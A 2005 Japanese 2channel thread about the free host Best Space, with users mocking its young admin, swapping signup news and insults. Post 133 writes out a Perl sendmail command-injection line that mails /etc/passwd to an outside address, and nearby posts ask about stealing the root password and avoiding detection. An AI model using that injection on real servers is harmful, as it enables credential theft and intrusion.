2ちゃんねる ■掲示板に戻る■ 全部 1- 最新50    

【だって】ベストスペースって【入院中ですから】

1 :名無しさん@お腹いっぱい。:2005/10/16(日) 20:52:54 0.net
■URL
-----------------------------------
p://be-sp.com
p://best-space.jp

■条件
-----------------------------------
無料、広告無し
容量は100M〜最大1Gまで(申請時100M)
PERL、PHP可
転送量制限無し
厨運営

■前スレ
-----------------------------------
【リア厨】ベストスペースってどうよ【その弐】
http://pc8.2ch.net/test/read.cgi/hosting/1124375830/

■過去スレ
-----------------------------------
1:http://pc8.2ch.net/test/read.cgi/hosting/1122986048/

2 :名無しさん@お腹いっぱい。:2005/10/16(日) 20:54:04 0.net
coq最高

3 :web@垢delete:2005/10/16(日) 20:55:34 P.net
よしあき最高!!!_| ̄|◯

4 :名無しさん ◆iOqLxYOSHI :2005/10/16(日) 21:08:53 0.net
http://yoshiaki.is-a-geek.org/
とりあえずDynDNSで取ってきたよ

5 :名無しさん@お腹いっぱい。:2005/10/16(日) 21:17:21 0.net
あげ

6 :名無しさん@お腹いっぱい。:2005/10/16(日) 21:36:40 0.net
新着情報

10/16 管理人
今後PHPの使用について規制をかける可能性があります。
また、一部のアカウントを規約の
[免責事項]
3、当方は独自の判断でユーザーのデータ・アカウントを削除できるものとする
の効力で削除いたしました。
------------
今回のアカウント削除につきましては、当方だけの損害でとどまる物でないからです。

また、10/14日までのファイルは当方でバックアップしてあります。
家の金庫にバックアップHDDごと保管してあります。
現在セキュリティアップを行っていますので、終了後利用する意思があればお問い合わせより問い合わせてください。
アカウントの復旧を行います。

7 :6:2005/10/16(日) 21:37:32 0.net
おっと掲示板参照

8 :名無しさん@お腹いっぱい。:2005/10/16(日) 21:40:24 0.net
http://best-space.jp/skycen/
http://best-space.jp/sorry/
http://best-space.jp/wai/
http://best-space.jp/poke611/
http://best-space.jp/vipper/
http://best-space.jp/satan-faithful-to-god/
http://best-space.jp/sozouyougi/
http://best-space.jp/web/
http://best-space.jp/seiji/
http://best-space.jp/bf5/

9 :名無しさん@お腹いっぱい。:2005/10/16(日) 21:50:10 0.net
そうなる前に対策するのが管理者の勤めだと思うが。

10 :名無しさん@お腹いっぱい。:2005/10/16(日) 21:59:46 0.net
そうだな

11 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:00:29 0.net
新スレ乙カレー

12 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:09:43 0.net
さぁて、次も色々やっちゃいますか?

サーバーのセキュリティは、ユーザーにとって大切ですから
検証する必要がありますよね(藁)

13 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:16:16 0.net
それは、管理人がすることだな

14 :6:2005/10/16(日) 22:19:06 0.net
新着情報

10/16 22:15 管理人
.htaccess導入しました。現在テストを行っております。
また、近々HDD交換を行います。交換後はパーミッションの設定が再設定になる可能性があります。
当方で交換前のパーミッションの設定まで行うかもしれません。
--------------------------------------------------------------------------------

10/16 21:00 管理人
PHPをセーフモードに移行しました。
一部のPHPに不具合が可能性があります。ご確認お願いいたします。

15 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:28:38 0.net
>>13
鯖管は信用出来ないお

16 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:31:30 0.net
マジ痛いな鯖管
名無しで降臨ですか

17 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:34:45 0.net
ユーザーにとっては最悪だな、セーフモード。

18 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:44:02 0.net
>>17
無論、鯖管のスキル不足のせいなんだが(藁)

19 :web@垢delete:2005/10/16(日) 22:47:41 P.net
Yoshiaki Qualityのサイト作ってまつ。
ノシ

20 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:48:03 0.net
批判すれば乙といわれ
いいとおもった感想書けば、管理人?


21 :6:2005/10/16(日) 22:48:17 0.net
HDD交換でデータ飛びましたとかなければいいけど。。。
金だして作るほどじゃないけど結構まじめなサイト作ってるから、無論自分でバックアップしてる。

22 :名無しさん@お腹いっぱい。:2005/10/16(日) 22:49:41 0.net
とうぜん

23 :名無しさん@お腹いっぱい。:2005/10/16(日) 23:00:30 0.net
ここはネタで借りるのが前提だろ。
こんなところでまじめにサイト作るのはただの馬鹿。

24 :6:2005/10/16(日) 23:27:17 0.net
いや、あせって探してたんだよ。。。
前のサーバが良く落ちるから。(個人)
それに個人の方が融通きくし。。

25 : ◆CoQSInE//U :2005/10/16(日) 23:58:20 0.net
>>19
.com,org,net,のドメインなら俺が提供してやる

26 :名無しさん ◆iOqLxYOSHI :2005/10/17(月) 00:08:49 0.net
>>25
キター(顔文字略)

27 :名無しさん ◆iOqLxYOSHI :2005/10/17(月) 00:29:52 0.net
ところで次回の新規会員募集っていつだろ・・・

28 :web@垢delete:2005/10/17(月) 00:43:51 P.net
>>25
神キタ!
とりあえずもうちょっと考えさせてください(いや、本当にドメイン取るかどうか考えます…^^)

>>27
退院したらじゃ…ないの?

29 :名無しさん@お腹いっぱい。:2005/10/17(月) 16:24:16 0.net
鯖缶後輪はまだですかああああああああああ

30 :名無しさん@お腹いっぱい。:2005/10/17(月) 16:29:29 0.net
マジレスすると、
降臨しないかわりにトリップ置いていった。。
だから、トリップ使ってかいてるのは偽物

以上マジレスですた

31 :名無しさん@お腹いっぱい。:2005/10/17(月) 18:37:41 0.net
>>30
名無しで降臨してくる罠。

32 :名無しさん@お腹いっぱい。:2005/10/17(月) 18:51:37 0.net
もう既にしていると思うが?

33 :名無しさん@お腹いっぱい。:2005/10/17(月) 20:14:45 0.net
>>32
おぉ!よしあき!

34 :名無しさん@お腹いっぱい。:2005/10/17(月) 22:06:01 0.net
っていうか、自分のスキル不足のためにアカウントを消す、ってどういう事なんだろ
真面目にネタとか、そういうレヴェルを超していると思うんだが

35 :web@垢デリ:2005/10/17(月) 22:14:33 P.net
有料のさくら鯖だって/homeディレクトリ直下は丸見えなのに…('A`)
この鯖は…

> FTPで/homeに降りると他人のアカウントが丸見えなのですが問題ありませんか?

> * デフォルトのパーミッションでは、他人のアカウントの存在はわかるが、他人のフォルダに入ることはできないので、無問題。
> * たとえるなら、表札の付いている玄関のドアを外から見られている程度のこと。
http://faq.sakura.ne.jp/wiki/wiki.cgi?FTP#i5

36 :名無しさん@お腹いっぱい。:2005/10/17(月) 22:16:30 0.net
それがよしあきクオリティなのかな・・

37 :名無しさん@お腹いっぱい。:2005/10/17(月) 22:29:27 0.net
全部よしあきクオリティ。

38 :名無しさん@お腹いっぱい。:2005/10/18(火) 01:39:16 0.net
でも、他のユーザのアカウント内情報も取得したじゃん

39 :名無しさん@お腹いっぱい。:2005/10/18(火) 03:46:36 0.net
>>38
よしあき!久しぶり!

40 :オナニスト ◆MRmxpjiK.2 :2005/10/18(火) 04:01:21 0.net
よしあき 病院ではPCつかっちゃだめだぞ
個室ならいいけど
タコ部屋ならやめとけよ 磁気によって他人に迷惑かかるから
誤作動とかするから。
当然携帯電話もね。便所でもだめ
使うなら外か個室で。
病院の入院書にもかいてあるでしょ?

41 :38:2005/10/18(火) 15:37:09 0.net
よしあきじゃねーよ!!!!!!!!!1111111

42 : ◆CoQSInE//U :2005/10/18(火) 17:52:22 0.net
厨房必至だな(v^-^)v

43 :名無しさん@お腹いっぱい。:2005/10/18(火) 20:20:40 0.net
>>41
なんだよ、よしあき。
webのやってることに反対した奴は居たか?
お前だけだろ。

44 :名無しさん@お腹いっぱい。:2005/10/18(火) 21:31:51 0.net
でもよしあきはROMってるがな(藁

45 :名無しさん@お腹いっぱい。:2005/10/18(火) 22:22:15 0.net
某スレより、

>>自分からリア厨を公言して、少々の教えて君ぶりを許してもらおうとするベスト
>>自分からリア厨を公言して、少々の教えて君ぶりを許してもらおうとするベスト
>>自分からリア厨を公言して、少々の教えて君ぶりを許してもらおうとするベスト
>>自分からリア厨を公言して、少々の教えて君ぶりを許してもらおうとするベスト

他のスレでもそう思われているそうです。

46 :名無しさん@お腹いっぱい。:2005/10/18(火) 22:38:24 0.net
age

47 :名無しさん@お腹いっぱい。:2005/10/18(火) 23:44:56 0.net
http://pc8.2ch.net/test/read.cgi/hosting/1095237599/152 =>>45
乙です。

48 :オナニスト ◆MRmxpjiK.2 :2005/10/19(水) 00:39:51 0.net
日時: 2005/10/19 00:15
名前: 管理人


次回、(現在日程は未定)HDDの交換を行う予定ですが、
そのとき予定どうりに進まない場合はパーミッションの設定を当方若しくは、ユーザ様に再設定していただくことになります。
そこで、当方で再設定するか、ユーザー様の方で再設定を行うかのアンケートを実施します。

当方が行う場合、全ユーザー様の設定のため復旧が遅くなりますが、ユーザー様の設定はありません。

ユーザー様が行う場合は、復旧が早くなりますが、ユーザー様の再設定が必要です。

HDD交換後は、sendmailの導入を考えております。
また、サーバ負担状態をみてユーザー様の新規アカウント募集を開始する予定です。

あくまでも通常どうり進まない場合の対処です。当方でも予定どうり進むよう準備しておりますが、システム的に不可能な場合があります。
システム的な問題につきましては、現在調査中ですが当サービスで使用しているシステムでの実施例がまだ見つかっておりません。



49 :名無しさん@お腹いっぱい。:2005/10/19(水) 01:53:40 0.net
オナニスト=鯖管

50 :名無しさん@お腹いっぱい。:2005/10/19(水) 05:18:58 0.net
>>47
ちょwwwwwwwwwwちげぇよwwww

9月には、まだベストとか興味なかったよw

51 :名無しさん@お腹いっぱい。:2005/10/19(水) 05:20:58 0.net
>>48
よしあきって、文体がやっぱり変だと思うな
ってか、こいつの場合はスキル不足だったからsendmailが導入できませんでした。

ってことになりそうだな

52 :名無しさん@お腹いっぱい。:2005/10/19(水) 09:06:41 0.net
>>51
お前の文体の方がよっぽどおかしい。
頭がいい人若しくは普通くらいの人何回か読み返せばわかる。

53 :名無しさん@お腹いっぱい。:2005/10/19(水) 09:27:43 0.net
プッ テラワロス

54 :名無しさん@お腹いっぱい。:2005/10/19(水) 10:06:56 0.net
Z

55 :名無しさん@お腹いっぱい。:2005/10/19(水) 11:08:34 O.net
文体がおかしい人が集まるスレはここですか?

56 :名無しさん@お腹いっぱい。:2005/10/19(水) 11:30:30 0.net
「どうり」

57 :名無しさん@お腹いっぱい。:2005/10/19(水) 12:26:37 0.net
そのとうり

58 :オナニスト ◆MRmxpjiK.2 :2005/10/19(水) 15:06:39 0.net
掲示板再開してよ よしあきさん!

59 :名無しさん@お腹いっぱい。:2005/10/19(水) 16:30:48 0.net
でも、ここ未だに軽いよね。。俺はよしあきじゃないぞ!!!!
ただ、まだ軽いよねって言いたかっただけ。

60 :名無しさん@お腹いっぱい。:2005/10/19(水) 18:29:19 0.net
>>59
ユーザーの数が少ないから当然じゃないか?

61 :名無しさん@お腹いっぱい。:2005/10/19(水) 18:31:34 0.net
よしあきはなんで読みたくなくなる書き方するんだろう?
世界には1文20字以内じゃないと読みたくなくなる人もいるのにww

62 :名無しさん@お腹いっぱい。:2005/10/19(水) 20:09:33 0.net
よしあきクオリティーだからww

63 :名無しさん@お腹いっぱい。:2005/10/19(水) 22:08:07 0.net
こんな鯖にカンパしよう、って奴も相当変わってるよなwww

64 :名無しさん@お腹いっぱい。:2005/10/19(水) 22:14:18 0.net


                  <⌒/ヽ-、__
                /<_/____/
                 ̄ ̄ ̄ ̄ ̄ ̄ ̄

65 :名無しさん@お腹いっぱい。:2005/10/20(木) 05:00:08 0.net
>>63
漏れは、よしあきクオリティー見せてもらったから
1円ぐらいならカンパしてやってもいいぞ。

66 :名無しさん@お腹いっぱい。:2005/10/20(木) 11:17:14 0.net


                  <⌒/ヽ-、__
                /<_/____/
  

67 :名無しさん@お腹いっぱい。:2005/10/20(木) 14:38:58 0.net

                  <⌒/ヽ-、__
                /<_/____/
 zzzz..
zzz...
zzzzzzzzz

68 :名無しさん@お腹いっぱい。:2005/10/20(木) 20:01:03 0.net
落ちてますね(藁

69 :名無しさん@お腹いっぱい。:2005/10/20(木) 20:58:44 0.net
復活あげ

70 :名無しさん@お腹いっぱい。:2005/10/21(金) 01:02:43 0.net



71 :オナニスト ◆MRmxpjiK.2 :2005/10/21(金) 07:14:04 0.net
ここで内緒でアダルトコンテンツ運営します。

72 :名無しさん@お腹いっぱい。:2005/10/21(金) 08:37:14 0.net
どうやって内緒でするのかな?
>>71

73 :オナニスト ◆MRmxpjiK.2 :2005/10/21(金) 09:14:30 0.net
教えることはできません。

ばれるので

74 :名無しさん@お腹いっぱい。:2005/10/21(金) 10:09:27 0.net
ほほー
面白いサイトできそうかな?

75 :名無しさん@お腹いっぱい。:2005/10/21(金) 18:22:51 0.net
まぁ、ageておこう

76 :595:2005/10/22(土) 02:48:32 0.net
アダルトあげ
アカウント晒しキボン・・

77 :595:2005/10/22(土) 03:58:37 0.net
アダルトあげ
アカウント晒しキボン・・

78 :オナニスト ◆MRmxpjiK.2 :2005/10/22(土) 17:29:11 0.net
さげ

79 :名無しさん@お腹いっぱい。:2005/10/22(土) 18:14:39 0.net
で、いい加減、サイト作らないか?

80 :名無しさん ◆iOqLxYOSHI :2005/10/22(土) 18:44:08 0.net
何を載せるんだ?と素朴な疑問
(発案者本人がこんなこと言ってしまう)

といっても、NO-DOMIBAKOBOTはサイトとしてほとんど機能してないからな、いいのかもな

81 :web@垢デリ:2005/10/22(土) 19:38:50 P.net
ホント、何を書いたらいいのか分からなかったので適当に作成。
##とりあえずStep Serverに置かせてもらい、完成したらbe-sp.hobby-site.comに移動する。

http://div.accela.jp/yoshiaki/

※作成に時間かかる場合は一旦私のサーバにでも置かせてもらいます。(後で移動)
※.htaccessで携帯(au,DoCoMo)からのアクセスを弾いています、ご了承ください。
いじょ。。


82 :名無しさん@お腹いっぱい。:2005/10/22(土) 19:49:03 0.net
SUGEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE

83 :オナニスト ◆MRmxpjiK.2 :2005/10/22(土) 20:02:44 0.net
日時: 2005/10/22 19:11
名前: 利用者


管理人さん、是非カンパをしたいのですが、だめでしょうか?


http://be-sp.com/a/bbs/patio.cgi?mode=view&no=16



これって絶対よしあきの自演だと思うんだけどwwwwwwwwwww


84 :名無しさん@お腹いっぱい。:2005/10/22(土) 20:15:47 0.net
>>83
かいたの?

85 : ◆CoQSInE//U :2005/10/22(土) 21:12:39 0.net
webmoney1ポイント提供します(^-^)v

86 :名無しさん@お腹いっぱい。:2005/10/22(土) 21:56:36 0.net
>>83乙!!

87 :名無しさん@お腹いっぱい。:2005/10/22(土) 22:48:57 0.net
応援はしないが、よしあきクオリティには興味あるwww

ってかWikiなんかは置かないの?
皆が編集できると嬉しいんだけど。。

88 :名無しさん@お腹いっぱい。:2005/10/22(土) 22:54:29 0.net
おくわけないとおもうが、

89 :名無しさん@お腹いっぱい。:2005/10/23(日) 00:35:57 0.net
今度このすれの住人で垢取り合戦やらねぇ?
コメント欄のテンプレとか、名前性別のテンプレ作ってどれが一番とれるか

90 : ◆CoQSInE//U :2005/10/23(日) 12:07:17 0.net
http://yoshiaki.mine.nu/
おらおら勝手に編集しる

91 :名無しさん@お腹いっぱい。:2005/10/23(日) 12:29:59 0.net
>>90
乙ですた

92 :名無しさん@お腹いっぱい。:2005/10/23(日) 12:37:38 0.net
いつも2番手乙ご苦労
甲をお忘れなくwww

93 :名無しさん@お腹いっぱい。:2005/10/24(月) 05:26:07 0.net
うわwwwwwwwwwwwちょスゴス

94 :名無しさん ◆iOqLxYOSHI :2005/10/24(月) 16:45:30 0.net
>>81
コンテンツ頑張ってください
XREA系サイトみたいに新規登録のコツを載せるとか。コツがあるかは不明ですが。

95 :名無しさん@お腹いっぱい。:2005/10/24(月) 17:16:21 0.net
おいおい!!
新規登録開始!!
http://best-space.jp/boshuu.html

96 :名無しさん@お腹いっぱい。:2005/10/24(月) 17:28:03 0.net
ちょww
おまいら垢取り合戦だww
伝言汁!!!

----------
無料鯖ベストスペース募集再開!!
@完全無料
A広告なし
B容量は最大1G(申請時100M)
CCGI、PHP対応(*1)!
D転送量無制限(*2)
E回線は光ファイバー100Mbps!!(*3)
F.htaccess使用可能(*4)
GSSI使用可能
H携帯用サイトも作成可能

新規登録開始!!
http://best-space.jp/boshuu.html

【だって】ベストスペースって【入院中ですから】
http://pc8.2ch.net/test/read.cgi/hosting/1129463574/

97 :名無しさん@お腹いっぱい。:2005/10/24(月) 17:42:53 0.net
150人以上が並んでるので今回取得はできないのではないだろうか・・・。

98 :名無しさん@お腹いっぱい。:2005/10/24(月) 18:18:46 0.net
>>97
俺的には、

よしあきの誇張

ねらーの大量申請

のどっちかと思っているんだがww

99 :名無しさん@お腹いっぱい。:2005/10/24(月) 18:40:52 0.net
倍率高そうだなw

100 :名無しさん@お腹いっぱい。:2005/10/24(月) 18:49:14 0.net
>>98
今はスレなくなったけど、前質問に答えてたときはすでに100人超えてたぞ

101 :100:2005/10/24(月) 18:52:00 0.net
でもあの時、期間長かったからな…

102 :名無しさん@お腹いっぱい。:2005/10/24(月) 18:58:08 0.net
ってかもうPerlでrootのパスワード抜けよ

103 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:01:30 0.net
しかしテンプレ屋から頂くとは・・・
ttp://www.netmania.jp/templates/top.php

104 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:04:24 0.net
>>103
その点はどうでもいい。
ってか前より綺麗になったしwww


自作できないなら、テンプレって事なんだろうなwww

105 :web@垢デリ:2005/10/24(月) 19:07:57 P.net
>>103
しかもトップページだけ…(´・ω・`)

106 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:14:10 0.net
>>105
お前のデザイン力も幼稚園児レベルだがな(^^)
http://div.accela.jp/yoshiaki/

107 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:19:02 0.net
>>106
本人じゃないが、この数日に直ぐアップしたのだから仕方がないのでは?

108 :web@垢デリ:2005/10/24(月) 19:22:24 P.net
すまねぇ…全然更新してなかった。

109 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:24:18 0.net
よしあきって中学生????

110 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:24:37 0.net
誰か垢取得申し込んだ香具師いる?

111 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:34:44 0.net
はいはいオモスオモス
http://best-space.jp/a/2.swf

112 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:37:13 0.net
重いな

113 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:37:54 0.net
>110


114 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:38:43 0.net
はいはいワロタワロタ
http://dragon.warcry.biz/modules/hakusen/userinfo.php?uid=7041

115 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:39:29 0.net
当方広告記載に協力しますか? ってはいにしたほうがいいわけ?

116 :名無しさん@お腹いっぱい。:2005/10/24(月) 19:42:19 0.net
>>115
もち。

117 :名無しさん@お腹いっぱい。:2005/10/24(月) 20:55:11 0.net
>>102明細キボン

118 :名無しさん@お腹いっぱい。:2005/10/24(月) 20:56:55 0.net
>>112
http://be-sp.com/a/

119 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:05:57 0.net
>>118
またよしあきに消されるぞ('A`)

120 :名無しさん ◆iOqLxYOSHI :2005/10/24(月) 21:11:27 0.net
>>119
ベストスペースのトップページ>負荷計測

ていうかサーバのuptime等取得するぐらいでアカウント消されたら、さすがにな・・・

121 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:11:46 0.net
これよしあきの垢だよ。。
サポ板とか全部ここから呼び出してる。

122 :名無しさん ◆iOqLxYOSHI :2005/10/24(月) 21:12:08 0.net
さて、9時だ
当選した人にはもう連絡が来ていたりするのだろうか

123 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:13:08 0.net
んでさっき1.65とかいってた。。。
なんか作業してたのだろうか。。
起動時間が30分前後だから多分なんかしらやっていたと。

124 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:14:52 0.net
http://be-sp.com/a/bbs/patio.cgi?mode=view&no=18

これよしあきの自演でねーの?

125 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:19:30 0.net
乙華麗

126 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:38:54 0.net
rootパスワード抜きソースキボン

127 :名無しさん@お腹いっぱい。:2005/10/24(月) 21:52:16 0.net


128 :名無しさん@お腹いっぱい。:2005/10/24(月) 22:05:57 0.net
LAがヤバイんだが

129 :▲ ◇SANUKI/VII:2005/10/24(月) 22:09:38 0.net
うんこ食べたい

130 :名無しさん ◆iOqLxYOSHI :2005/10/24(月) 22:11:16 0.net
best-space.jp,0, 22:10:13 up 1:35,0, 1.72, 1.12
おお、上昇中か?

なぜかlao-plain.cgiが置いてあるぞw

131 :web@垢デリ:2005/10/24(月) 22:13:50 P.net
>>130
俺が以前それをコソーリ置いた事があって(さくらスレで貰った奴)を
ベストスペース用に改良したから、よしあきが貰って行ったのかな?

どうでもいいけど…

132 :名無しさん ◆iOqLxYOSHI :2005/10/24(月) 22:24:52 0.net
そういえば、適当にググってみると、よしあきもさくらのレンタルサーバのアカウント持ってるんですね

133 :102:2005/10/24(月) 22:25:59 0.net
例えば、sendmailが使える鯖でセキュリティも何も考えてない鯖だと、
open (MAIL,"| /usr/lib/sendmail test@test.com; mail hoge@hoge.com</etc/passwd;");
みたいなことが出来るらしいね
(たしか、/etc/passwd と言うファイルを hoge@hoge.com宛てに送る、って事だったかと)
Unixシステムユーザーのパスワード等の大切な情報が格納されているファイルらしいけど詳細はしらね

systemや
execなんていう関数も使えるんじゃないかな?
(使い方はぐぐって下さい)

ってことを言いたかっただけ
変な言い方してすまないね

134 :名無しさん@お腹いっぱい。:2005/10/24(月) 22:39:38 0.net
ほ〜サンクス

135 :名無しさん@お腹いっぱい。:2005/10/24(月) 22:59:42 0.net
パス抜き取ってもバレなければOK?

136 :名無しさん@お腹いっぱい。:2005/10/24(月) 23:06:06 0.net
ログからばれるんでね?
>>135なんかいい方法思いついたか?

137 :名無しさん@お腹いっぱい。:2005/10/25(火) 02:52:58 0.net
畜生。申し込んだのに落とされた。
規約云々とか言っているけどちゃんと守ってチェック入れたぞこの野郎!

138 :名無しさん@お腹いっぱい。:2005/10/25(火) 08:05:46 0.net
右より禁止事項を選択してください。*
こんなんあったけ。
おぼえてねぇ

139 :名無しさん@お腹いっぱい。:2005/10/25(火) 14:44:47 0.net
漏れ見たときあったけど、マンドクセからスルーしたら、落とされた

140 :名無しさん@お腹いっぱい。:2005/10/25(火) 17:05:25 0.net
漏れ間違えて規約に同意しません。
にしちまった…orz

141 :名無しさん@お腹いっぱい。:2005/10/25(火) 20:26:16 0.net
規約と注意事項はよしあきの罠だな。


142 :名無しさん@お腹いっぱい。:2005/10/25(火) 21:48:31 0.net
流石2chに降臨してただけあるな。
ネラーを審査でぶった切ってる気がする…
おまいら、ちゃんと項目書かないと落ちるぞ
今日の当選者数見てみ >>サポート掲示板

143 :名無しさん@お腹いっぱい。:2005/10/25(火) 23:39:41 0.net
>>136
一週間ほど前に抜き取っておいたが・・・・


晒してもOKww?

144 :名無しさん@お腹いっぱい。:2005/10/26(水) 01:02:52 0.net
rootパス?

145 :名無しさん@お腹いっぱい。:2005/10/26(水) 01:55:07 0.net
漏れよくよしあきとMSNメッセするんだけど(ってかリア友)
よしあき多分晒されたら、警察に被害届けだすと思うよ。
まぁ、晒される前にこのスレ見てたら普通に変更してると思うが…
とりあえず、よしあきの病院から警察署までは異様に近いから

信じても信じなくてもいいけどな 漏れは名無しだし

146 :名無しさん@お腹いっぱい。:2005/10/26(水) 02:31:40 0.net
よしあき:神
dala  :下痢
coq   :基地外

147 :名無しさん@お腹いっぱい。:2005/10/26(水) 05:28:14 0.net
>>145
はいはいよしあきよしあき


>>146
…coq最高ww

148 :名無しさん@お腹いっぱい。:2005/10/26(水) 07:40:26 0.net
一部、変更前のフォームからの方もいましたが、そちらの方は通常審査で落選となりました。


ちょwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

149 :coq ◆OOOOOkCOQc :2005/10/26(水) 14:18:18 O.net
X-Gmail-Received: 1e26e8d4d9c9462adb20cf0f8c8362552cd5e3fd
Delivered-To: coq509@gmail.com
Received: by 10.64.179.19 with SMTP id b19cs34780qbf;
Tue, 25 Oct 2005 00:41:28 -0700 (PDT)
Received: by 10.36.50.15 with SMTP id x15mr1325210nzx;
Tue, 25 Oct 2005 00:41:28 -0700 (PDT)
Return-Path: <anonymous@s213.secure.ne.jp>
Received: from s213.secure.ne.jp (s213.secure.ne.jp [202.74.21.11])
by mx.gmail.com with SMTP id r1si2740126nzd.2005.10.25.00.41.27;
Tue, 25 Oct 2005 00:41:28 -0700 (PDT)
Received-SPF: pass (gmail.com: best guess record for domain of anonymous@s213.secure.ne.jp designates 202.74.21.11 as permitted sender)
Received: (qmail 2598 invoked by uid 10027); 25 Oct 2005 16:41:23 +0900
Date: 25 Oct 2005 16:41:23 +0900
Message-ID: <20051025074123.2597.qmail@s213.secure.ne.jp>
X-Mailer: Perl Script For SMTP by T.Ogasawara
Content-Type: text/plain; charset=iso-2022-jp
From: yoshiaki-baseball2@hotmail.co.jp
Subject: =?ISO-2022-JP?B?GyRCJCo/PSQ3OX4kXyROJCpDTiRpJDsbKEI=?=
To: coq509@gmail.com

coq様お申し込みありがとうございます。
本日、夜九時に審査中を行います。
当選していれば後日、当選メールが届きます。
誠に申し訳ありませんが、1週間程度お待ちになってください。

150 :名無しさん@お腹いっぱい。:2005/10/26(水) 18:45:21 0.net
>>149
ヘッダがもの凄くきになるんだがwww

151 :名無しさん@お腹いっぱい。:2005/10/26(水) 20:23:49 0.net
age

152 :名無しさん@お腹いっぱい。:2005/10/26(水) 20:40:15 0.net
あげるなよwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

153 :名無しさん@お腹いっぱい。:2005/10/26(水) 21:09:14 0.net
yada

154 :名無しさん@お腹いっぱい。:2005/10/26(水) 22:16:22 0.net
>>149-153
coq乙

155 :名無しさん@お腹いっぱい。:2005/10/26(水) 22:46:51 0.net
あぼーん設定したら便利だよ

156 :名無しさん@お腹いっぱい。:2005/10/26(水) 23:17:08 0.net
coq申請落ちおめでとうwwwwwww

157 :名無しさん@お腹いっぱい。:2005/10/27(木) 00:24:50 0.net
>>155
coqを?

158 :coq ◆OOOOOkCOQc :2005/10/27(木) 08:17:35 O.net
何この荒らし認定('A`)

159 :名無しさん@お腹いっぱい。:2005/10/27(木) 18:42:41 0.net
age

160 :名無しさん@お腹いっぱい。:2005/10/27(木) 19:47:07 0.net
>>158
ドンマイ

161 :名無しさん@お腹いっぱい。:2005/10/27(木) 21:59:16 0.net
あらら?
ベストスペースのメールが迷惑メールに入ってんぞ

162 :名無しさん@お腹いっぱい。:2005/10/27(木) 22:14:37 0.net
今、利用者何人?

163 :名無しさん@お腹いっぱい。:2005/10/27(木) 22:30:39 0.net
>>161
ワロスwwwwwwwwwwwwwwww

164 :名無しさん@お腹いっぱい。:2005/10/27(木) 22:43:31 0.net
coq ←テラワロス

165 : ◆CoQSInE//U :2005/10/28(金) 11:38:38 0.net
coq ←地球に要らない人

166 :名無しさん@お腹いっぱい。:2005/10/28(金) 16:11:00 0.net
coq>>>>ドミ箱>>>讃岐>>>dala>>>よしあき

167 :名無しさん@お腹いっぱい。:2005/10/28(金) 16:52:18 0.net
よしあき>讃岐>>>>超えられない壁>>>>>>>>>>ドミ箱
>>>>>>>>>>>coq>>>>>超えてはならない壁>>>>>>dala


168 :名無しさん ◆iOqLxYOSHI :2005/10/28(金) 16:54:06 0.net
いちばん技術あるのはドミ箱か?

169 : ◆CoQSInE//U :2005/10/28(金) 19:00:06 0.net
>>168
技術の点は確かに評価してる。
~~~~~

170 :名無しさん@お腹いっぱい。:2005/10/28(金) 20:00:24 0.net
一番技術がないのはよしあきだな

dalaは一応自動でサーバーアカウント発行するスクリプト作ってたから…


171 :coq ◆OOOOOkCOQc :2005/10/28(金) 20:56:44 O.net
発行「だけ」だったら、perlの``とかphpのsystem()で一発じゃないのかと小一時間

172 :名無しさん@お腹いっぱい。:2005/10/28(金) 21:17:42 0.net
>>171馬鹿丸出しですね…
dalaもwin鯖だからうんこ
大体自称プログラマーであれくらい作れなきゃ使い物にならない
大体なんで自作とわかるんだ?もらったかもしれないし、買ったのかもしれない
ってことで>>170はdalaで認定でおk?

173 :名無しさん@お腹いっぱい。:2005/10/28(金) 21:39:22 0.net
>>172おk!

174 :名無しさん@お腹いっぱい。:2005/10/28(金) 22:38:44 0.net
ちょwwwwwdala認定かよww

いいけどねん。
自称プログラマーだから、多分技術は有るんじゃないかと思っただけ。

有料で買う奴なんかはいないと思うが。。

175 :名無しさん@お腹いっぱい。:2005/10/29(土) 00:16:02 0.net
rootパスってどうやって抜くの?

176 :名無しさん@お腹いっぱい。:2005/10/29(土) 03:00:26 0.net
なんかあぼーんだらけで見づらいスレですね。

177 :名無しさん@お腹いっぱい。:2005/10/29(土) 08:35:37 0.net
あぼーんワード何にしてる?

178 :名無しさん@お腹いっぱい。:2005/10/29(土) 15:06:42 0.net
名無しさん@お腹いっぱい。

179 :名無しさん@お腹いっぱい。:2005/10/29(土) 17:05:13 0.net
>>178ちょwwwww藻前もあぼーんだぞ

180 :名無しさん@お腹いっぱい。:2005/10/29(土) 19:10:18 0.net
あげようぜいwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

181 :名無しさん@お腹いっぱい。:2005/10/29(土) 19:15:38 0.net
ここはsage推奨だから
あげている奴は帰れよ

それと、よしあきへの誹謗・中傷は無し
よしあきに不利になる情報も駄目

わかったか?

182 :名無しさん@お腹いっぱい。:2005/10/29(土) 19:24:51 0.net
>>181
よしあき名無しで乙(笑)
誹謗中傷と批判の区別が出来ない人は帰ってもらおうか。

183 :767:2005/10/29(土) 20:12:03 0.net
>>181=>>182
